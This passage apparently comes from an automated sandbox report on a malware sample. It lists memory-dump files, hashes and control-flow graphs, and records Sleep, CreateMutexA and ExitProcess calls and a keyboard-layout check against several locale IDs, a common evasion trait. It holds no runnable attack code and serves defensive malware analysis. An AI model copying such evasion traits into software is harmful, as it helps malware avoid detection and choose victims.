                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                                • Opcode ID: ee71e70ee60ec51182ebc4dd07fc6e56e7539ffa182e34e95e6eec79ce17e5b7
                                                                                                                                                                                                                                                                • Instruction ID: 4f6252f90db60b11818326ea4e2c767815ad0642771be73de4a0d35f8f728181
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee71e70ee60ec51182ebc4dd07fc6e56e7539ffa182e34e95e6eec79ce17e5b7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92E08C30140648AECF257B18DC5DE8C3B69FF61782F140801FD189A226DB25EE91CB81

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                                                • API String ID: 0-3963862150
                                                                                                                                                                                                                                                                • Opcode ID: ecab46ca028f115ff0512e5370be8b208f6447f6e6b099eee194db1e9ec95f7a
                                                                                                                                                                                                                                                                • Instruction ID: c5b75e2fc15e4a793a0abd32edf6388cab4d39a76c33555c5df4ccfced5ff6c7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ecab46ca028f115ff0512e5370be8b208f6447f6e6b099eee194db1e9ec95f7a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDF1D27090025C9FEB24DF58CC85BDEBBB9FB45304F5042A8F918E7281DB749A98CB91

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 219 859ba5-859d91 call 867a00 call 855c10 call 858b30 call 868220
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0085A963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: b346de9c9a1efbadaa8319dc140fb85fc792d8bea2c2910554468f86f0e0f4f0
                                                                                                                                                                                                                                                                • Instruction ID: 9ab7dd7cda47854d6a497aa5671b58cda56286f6cb383a45a5f351e2da5e35d5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b346de9c9a1efbadaa8319dc140fb85fc792d8bea2c2910554468f86f0e0f4f0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8311871704204DBFB089B6CDCC97AEBB62FB91322F244318E854D73D5C77599888752

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 241 859f44-859f64 245 859f66-859f72 241->245 246 859f92-859fae 241->246 247 859f74-859f82 245->247 248 859f88-859f8f call 86d663 245->248 249 859fb0-859fbc 246->249 250 859fdc-859ffb 246->250 247->248 251 85a92b 247->251 248->246 253 859fd2-859fd9 call 86d663 249->253 254 859fbe-859fcc 249->254 255 859ffd-85a009 250->255 256 85a029-85a916 call 8680c0 250->256 260 85a953-85a994 Sleep CreateMutexA 251->260 261 85a92b call 886c6a 251->261 253->250 254->251 254->253 257 85a01f-85a026 call 86d663 255->257 258 85a00b-85a019 255->258 257->256 258->251 258->257 270 85a9a7-85a9a8 260->270 271 85a996-85a998 260->271 261->260 271->270 273 85a99a-85a9a5 271->273 273->270
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0085A963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 1417903dc5fea86a2f89c26e69d2bbf15e17f1a55c33d6d9046b0de1b874cd1a
                                                                                                                                                                                                                                                                • Instruction ID: 5c8915b6530ddd5fdadf2459a3fc96f47fce1ebb0321c2f578ceaa931598aa9c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1417903dc5fea86a2f89c26e69d2bbf15e17f1a55c33d6d9046b0de1b874cd1a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E314631700204CBEF0C9B68DCC9BADBB62FF85312F204719E824E72D1CB7699888752

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
